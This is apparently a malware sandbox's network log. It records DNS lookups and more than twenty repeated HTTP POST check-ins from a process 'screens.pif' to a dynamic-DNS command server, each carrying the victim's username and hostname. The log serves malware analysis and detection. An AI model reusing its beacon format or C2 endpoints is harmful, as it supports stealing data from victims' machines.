Oct 3, 2024 09:21:46.617948055 CEST	192.168.2.10	1.1.1.1	0xd8a7	Standard query (0)	freighteighttwocam.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:20:40.848423004 CEST	1.1.1.1	192.168.2.10	0x7b9	No error (0)	www.sodiumlaurethsulfatedesyroyer.com	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:40.848423004 CEST	1.1.1.1	192.168.2.10	0x7b9	No error (0)	www.sodiumlaurethsulfatedesyroyer.com	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:46.689939976 CEST	1.1.1.1	192.168.2.10	0xc7b	No error (0)	freighteighttwocam.ddns.net	45.149.241.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:21:46.627782106 CEST	1.1.1.1	192.168.2.10	0xd8a7	No error (0)	freighteighttwocam.ddns.net	45.149.241.169	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.sodiumlaurethsulfatedesyroyer.com

freighteighttwocam.ddns.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:46.737293959 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 172 Connection: close
Oct 3, 2024 09:20:46.743247032 CEST	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rubrok301389BROK-PCk0FDD42EE188E931437F4FBE2Cvjza5
Oct 3, 2024 09:20:47.526560068 CEST	169	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49708	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:47.680047989 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 172 Connection: close
Oct 3, 2024 09:20:47.692235947 CEST	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rubrok301389BROK-PC+0FDD42EE188E931437F4FBE2CScFzl
Oct 3, 2024 09:20:48.453088999 CEST	169	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49709	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:48.552500963 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:20:48.567975998 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:56.427699089 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49715	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:56.590853930 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:20:56.608551979 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:57.648911953 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49716	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:58.069458008 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:20:58.316278934 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:59.140589952 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49717	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:59.283987045 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:20:59.297568083 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:00.116126060 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49718	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:00.487117052 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:00.494707108 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:01.613163948 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49719	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:01.772759914 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:01.777715921 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:03.525882006 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49720	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:03.678724051 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:03.684047937 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:04.410466909 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49721	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:04.581398010 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:04.600647926 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:05.365163088 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49722	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:05.520092964 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:05.528198004 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:06.262666941 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49723	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:06.418783903 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:06.423847914 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:07.156114101 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49724	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:07.330524921 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:07.339145899 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:08.095299959 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49725	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:08.249841928 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:08.254832983 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:09.011538029 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49726	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:09.158802032 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:09.163793087 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:09.861022949 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49727	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:10.033673048 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:10.038727999 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:10.867872000 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49728	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:11.033385038 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:11.038525105 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:11.917903900 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49729	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:12.092761993 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:12.097651005 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:12.878017902 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49730	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:13.045036077 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:13.053982019 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:13.804303885 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49731	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:13.958497047 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:13.963378906 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:14.643101931 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49732	45.149.241.169	80	688	C:\Users\user\Desktop\screens.pif

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:14.806760073 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 145 Connection: close
Oct 3, 2024 09:21:14.812196016 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
